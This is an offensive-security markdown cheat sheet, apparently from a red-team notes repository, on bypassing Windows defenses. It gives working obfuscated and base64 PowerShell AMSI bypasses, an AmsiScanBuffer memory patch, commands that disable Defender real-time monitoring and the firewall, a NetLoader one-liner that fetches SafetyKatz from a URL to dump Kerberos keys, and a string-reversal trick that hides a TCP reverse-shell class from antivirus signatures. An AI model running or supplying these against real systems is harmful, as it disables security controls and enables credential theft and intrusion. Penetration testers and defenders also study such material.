Skip to content

Latest commit

 

History

History
163 lines (115 loc) · 4.56 KB

bypass-defenses.md

File metadata and controls

163 lines (115 loc) · 4.56 KB

Bypass defenses

AMSI Bypass

PowerShell AMSI Bypass

{% tabs %} {% tab title="Obfuscated" %} {% code fullWidth="false" %}

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

{% endcode %} {% endtab %}

{% tab title="Base64" %}

[Ref].Assembly.GetType('System.Management.Automation.'+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBtAHMAaQBVAHQAaQBsAHMA')))).GetField($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBtAHMAaQBJAG4AaQB0AEYAYQBpAGwAZQBkAA=='))),'NonPublic,Static').SetValue($null,$true)

{% endtab %} {% endtabs %}

.NET AMSI Bypass

$ZQCUW = @"
using System;
using System.Runtime.InteropServices;
public class ZQCUW {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $ZQCUW

$BBWHVWQ = [ZQCUW]::LoadLibrary("$([SYstem.Net.wEBUtIlITy]::HTmldecoDE('amsi.dll'))")
$XPYMWR = [ZQCUW]::GetProcAddress($BBWHVWQ, "$([systeM.neT.webUtility]::HtMldECoDE('AmsiScanBuffer'))")
$p = 0
[ZQCUW]::VirtualProtect($XPYMWR, [uint32]5, 0x40, [ref]$p)
$TLML = "0xB8"
$PURX = "0x57"
$YNWL = "0x00"
$RTGX = "0x07"
$XVON = "0x80"
$WRUD = "0xC3"
$KTMJX = [Byte[]] ($TLML,$PURX,$YNWL,$RTGX,+$XVON,+$WRUD)
[System.Runtime.InteropServices.Marshal]::Copy($KTMJX, 0, $XPYMWR, 6)

Invisi-Shell

{% embed url="https://github.com/OmerYa/Invisi-Shell" %}

Invisi-Shell bypasses all of PowerShell security features (ScriptBlock logging, Module logging, Transcription, AMSI) by hooking

Usage

# With admin privileges:
RunWithPathAsAdmin.bat 

# More Silent
# With non-admin privileges:
RunWithRegistryNonAdmin.bat

# Type exit from the new PowerShell session to complete the clean-up.
exit

Loader

use NetLoader to unhook ETW and patch AMSI then run executable from URL without saving

NetLoader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit

Windows Defender

Note: If Tamper protection is enabled you will not be able to turn off Defender by CMD or PowerShell. You can however, still create an exclusion.

Disable real time monitoring

Set-MpPreference -DisableRealtimeMonitoring $true

Disable scanning for downloaded files (more silent and preferred)

Set-MpPreference -DisableIOAVProtection $true

Create an exclusion

Add-MpPreference -ExclusionPath "C:\Windows\Temp"

Firewall

Note: requires Admin privileges.

Disable using PowerShell

Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

Disable manually

AV Signatures Bypass

AMSITrigger

identify the part of a script is detected

{% embed url="https://github.com/RythmStick/AMSITrigger" %} AMSITrigger {% endembed %}

usage

AmsiTrigger_x64.exe -i PowerUp.ps1

Example for scanning

Example for bypassing 

# Reverse the "Net.Sockets" string

$String = "stekcoS.teN"
$class = ([regex]::Matches($String,'.','RightToLeft') | ForEach {$_.value}) -join ''
if ($Reverse)
{
 $client = New-Object System.$class.TCPClient($IPAddress,$Port)
}

DefenderChecker

Identify code and strings from a binary / file that Windows Defender may flag

{% embed url="https://github.com/t3hbb/DefenderCheck" %} DefenderChecker {% endembed %}

usage

DefenderCheck.exe PowerUp.ps1